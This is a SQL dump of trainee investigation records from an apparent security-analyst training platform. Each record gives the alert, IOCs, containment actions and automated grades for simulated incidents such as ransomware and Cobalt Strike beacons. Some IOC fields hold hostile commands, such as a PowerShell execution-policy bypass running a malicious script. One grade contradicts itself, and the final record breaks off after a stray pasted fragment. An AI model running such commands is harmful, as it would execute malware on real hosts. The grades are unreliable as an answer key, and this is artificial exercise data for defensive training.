(329, 213, 274, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:38:14\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:38:14.483Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:35:33', '2026-02-28 21:00:00', 0, NULL),
(330, 210, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-26 21:36:40', '2026-02-26 21:36:40', 0, NULL),
(331, 213, 275, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:39:37\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:39:42.138Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:38:14', '2026-02-28 21:00:00', 0, NULL),
(332, 213, 276, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:40:58\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:40:59.803Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:39:42', '2026-02-28 21:00:00', 0, NULL),
(333, 213, 277, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:43:12\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:43:14.905Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:41:02', '2026-02-28 21:00:00', 0, NULL),
(334, 210, 937, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-192.168.1.10\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\",\"close_alert\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/26/2026, 4:49:51 PM\\nALERT: Unusual Login Failure from Known Safe IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 192.168.1.10\\n- [USERNAME] bsmith\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:49:59.093Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-26 21:42:08', '2026-02-28 21:00:00', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(335, 213, 278, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:44:40\\nALERT: Compromised Update Detected [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e5d8870e5bdd26602c622b7e5b0f6b4c\\n- [FILENAME] lib_mgmt.dll\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:44:41.105Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:43:21', '2026-02-28 21:00:00', 0, NULL),
(336, 213, 279, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:45:36\\nALERT: Execution of Malicious Code [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] malicious.dll\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:45:38.784Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:44:41', '2026-02-28 21:00:00', 0, NULL),
(337, 213, 280, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-abc123de\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:46:38\\nALERT: Establish Persistence [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] abc123def4567890abc123def4567890\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:46:38.462Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:45:38', '2026-02-28 21:00:00', 0, NULL),
(338, 213, 281, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.55\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:47:43\\nALERT: Lateral Movement and Data Exfiltration [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.55\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_data.xlsx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:47:43.288Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:46:38', '2026-02-28 21:00:00', 0, NULL),
(339, 213, 285, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.34\",\"ip-10.0.2.15\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:50:00\\nALERT: Spear-Phishing Email Campaign Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.34\\n- [IP] 10.0.2.15\\n- [EMAIL] john.doe@fakeorg.com\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [URL] http://malicious-link.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:50:20.996Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:47:47', '2026-02-28 21:00:00', 0, NULL),
(340, 213, 286, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.14.22.5\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"domain-http://login\",\"domain-login-secure\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:52:12\\nALERT: Malicious Domain Infrastructure Identified [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.14.22.5\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] http://login-secure-portal.com/login\\n- [DOMAIN] login-secure-portal.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:52:13.392Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:50:21', '2026-02-28 21:00:00', 0, NULL),
(341, 213, 287, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:53:40\\nALERT: OAuth Token Abuse Technique Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] j.doe@company.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:53:40.267Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:52:13', '2026-02-28 21:00:00', 0, NULL),
(342, 213, 288, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.50\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:54:38\\nALERT: Disinformation Campaign Planning Uncovered [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.50\\n- [IP] 192.168.1.105\\n- [HASH] 8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\n- [FILENAME] election_strategy_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:54:38.371Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:53:40', '2026-02-28 21:00:00', 0, NULL),
(343, 213, 289, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-26 21:54:45', '2026-02-26 21:54:45', 0, NULL),
(344, 210, 713, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-212.47.229.1\",\"ip-192.168.1.10\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/26/2026, 4:56:35 PM\\nALERT: Failed Login Attempts from Unusual Location\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 212.47.229.1\\n- [IP] 192.168.1.10\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:56:46.733Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:55:01', '2026-02-28 21:00:00', 0, NULL),
(345, 210, 680, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.30.5\",\"ip-192.168.30.10\",\"artifact_2\"],\"selectedActions\":[\"close_alert\",\"collect_forensics\",\"isolate_host\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/26/2026, 5:00:09 PM\\nALERT: Innocuous User Activity Mistaken for Attack\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.30.5\\n- [IP] 192.168.30.10\\n- [USERNAME] jane.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T22:00:13.714Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:57:30', '2026-02-28 21:00:00', 0, NULL),
(346, 189, 290, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"hash-3f0a2f5e\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:28:12 AM\\nALERT: TrickBot Malware Execution [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [HASH] 3f0a2f5e4d3a9b5c7f6e9df123456789\\n- [IP] 34.210.123.158\\n- [FILENAME] trickbot.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:28:30.484Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:24:38', '2026-02-28 21:00:00', 0, NULL),
(347, 189, 291, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:31:48 AM\\nALERT: Persistence Mechanism Identified [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] \\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\\\" --silent\\n- [FILENAME] trickbot.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:32:05.023Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:28:30', '2026-02-28 21:00:00', 0, NULL),
(348, 189, 292, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.161.35.75\",\"ip-10.10.15.23\",\"hash-b1946ac9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:37:43 AM\\nALERT: Cobalt Strike Beacon Detected [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 193.161.35.75\\n- [IP] 10.10.15.23\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] beacon.exe\\n- [USERNAME] janedoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-27T02:37:57.252Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:32:05', '2026-02-28 21:00:00', 0, NULL),
(349, 189, 293, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"hash-a3f5d6e8\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:45:38 AM\\nALERT: Ransomware Encryption Initiated [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.23\\n- [HASH] a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\\n- [IP] 10.0.0.25\\n- [FILENAME] patient_records.dat\\n- [USERNAME] hospital_admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\nOn Windows 10, enable cloud-delivered protection and Attack Surface Reduction (ASR) rules to block the execution of files that resemble ransomware.[163] In AWS environments, create an IAM policy to restrict or block the use of SSE-C on S3 buckets\\n\\nANALYSIS\\n--------\\nInvestigation 